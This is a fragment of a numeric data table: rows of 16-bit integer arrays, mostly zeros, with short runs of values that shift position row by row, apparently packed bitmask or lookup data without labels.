[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 50564, 60481, 13286, 12550, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 16128, 10176, 64496, 22140, 12863, 59540],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 11396, 833, 41190, 44550, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 32256, 12160, 2016, 1784, 60327],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 37764, 6721, 3558, 11014, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 5120, 25856, 41280, 28240, 13844, 31333, 14070],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 64132, 12609, 31462, 43014, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 22528, 38400, 54656, 59744, 30040, 34710, 30257],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 24964, 18497, 59366, 9478, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 60416, 56064, 44736, 58800, 32492, 43739, 2760],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 51332, 24385, 21734, 41478, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 20736, 19520, 21776, 51908, 12011],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 12164, 30273, 49638, 7942, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 1024, 8448, 45120, 31248, 14084, 38177, 38026],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 38532, 36161, 12006, 39942, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 512, 53376, 20512, 42248, 24578, 12373],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 64900, 42049, 39910, 6406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 46848, 1472, 33648, 46172, 57015, 41148],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 25732, 47937, 2278, 38406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 11520, 62272, 15056, 24815],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 52100, 53825, 30182, 4870, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 7424, 3904, 39376, 7412, 24861, 47070],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 12932, 59713, 58086, 36870, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 44544, 23424, 23264, 56760, 37550, 4921],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 39300, 65, 20454, 3334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 54016, 11456, 38192, 59084, 35283, 15984],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 132, 5953, 48358, 35334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 9984, 37312, 37488, 49948, 42419],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 26500, 11841, 10726, 1798, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 22784, 48704, 36240, 22500, 47705, 38130],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 52868, 17729, 38630, 33798, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 39424, 30336, 51616, 20328, 11162, 8925],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 13700, 23617, 998, 262, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 12032, 9152, 56048, 1596, 43055, 14308],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 40068, 29505, 28902, 32262, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 43008, 10752, 14976, 58016, 4008, 57655],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 900, 35393, 56806, 64262, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 54528, 48448, 5456, 22484, 48341, 57286],
